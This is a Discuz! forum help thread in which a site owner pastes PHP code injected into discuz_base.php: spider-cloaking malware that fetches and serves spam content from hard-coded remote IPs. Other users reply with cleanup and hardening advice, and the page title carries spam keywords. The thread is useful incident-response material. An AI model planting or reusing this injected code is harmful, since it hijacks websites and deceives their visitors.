久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區

標題: source\class\discuz\discuz_base.php文件被修改了 [打印本頁]

作者: yyw 時間: 2021-4-17 12:47
標題: source\class\discuz\discuz_base.php文件被修改了
source\class\discuz\discuz_base.php文件被修改了，被加了代碼，如下：
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
  $ch = curl_init();

  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_HEADER, 0);

  $output = curl_exec($ch);

  curl_close($ch);

  return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
@chmod($file_name, 0755);
}
@chmod(__FILE__, 0755);
set_writeable($filename1);
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://155.159.254.236:9867");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".gq")or $tr(url, ".xlsx") and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
echo file_get_contents('http://155.159.254.254:9368/sb.html');
exit;
}
if (preg_match(regs, ent)) {
if (area) {
      echo httpGet(site.road);
      exit;
} else {
      echo httpGet("http://155.159.254.254:9368/u.php");
      ob_flush();
      flush();
}
}

作者: 老周部落 時間: 2021-4-17 13:10
這個需要您自行清理環境，完了升級最新版本解決。

作者: 老周部落 時間: 2021-4-17 13:13
如果之前用的就是最新版本，一般都是底層環境有漏洞或者密碼泄露，或者 Discuz! / UCenter 管理員密碼 / UC_KEY 泄露導致的。

作者: yyw 時間: 2021-4-17 13:33

老周部落發表于 2021-4-17 13:13
如果之前用的就是最新版本，一般都是底層環境有漏洞或者密碼泄露，或者 Discuz! / UCenter 管理員密碼 / UC ...

煩死了，文件全都用官方替換了，密碼也改了，這個月已經中招三次了，今天又發現index.php又被改了。

作者: 老周部落 時間: 2021-4-17 14:23

yyw 發表于 2021-4-17 13:33
煩死了，文件全都用官方替換了，密碼也改了，這個月已經中招三次了，今天又發現index.php又被改了。 ...

1. 服務器是否淪陷了，建議重新部署一次，整個目錄全面殺毒，只提取必要的部分部署，避免單獨的后門文件。
2. 重新部署的時候建議使用比較新的 Linux 發行版，并正確配置寫入權限。
3. 關閉掉亂七八糟的插件、模板，建議關閉卸載并刪除文件，避免黑客通過后門進入。
4. UC_KEY 以及應用 AUTHKEY 建議都重置一次，避免黑客掌握這些。
5. 所有的管理員密碼全部強制重置一次。

作者: allthebest 時間: 2021-4-17 18:59
盜版插件不先清除，中招問題沒法解決的說。

作者: crx349 時間: 2021-4-23 01:49

yyw 發表于 2021-4-17 13:33
煩死了，文件全都用官方替換了，密碼也改了，這個月已經中招三次了，今天又發現index.php又被改了。 ...

掛馬了做好服務器安全先

作者: 羅永浩 時間: 2021-4-23 02:22
插件盜版？

作者: 老周部落 時間: 2021-4-26 22:27

老周部落發表于 2021-4-17 14:23
1. 服務器是否淪陷了，建議重新部署一次，整個目錄全面殺毒，只提取必要的部分部署，避免單獨的后門文件 ...

6. 建議完善權限設置，除 data 、template 以及 source/plugin 外，其他目錄不允許寫入，這三個目錄不允許用戶直接訪問 .php 文件。

作者: dashen 時間: 2021-5-14 11:28
被入侵肯定不止一個后門，要清理干凈全部后，再升級最新版，再做其他安全設置。
自己處理不干凈，可以考慮找人處理：https://addon.dismall.com/service.html

歡迎光臨 Discuz! 官方交流社區 (http://www.9999xn.com/)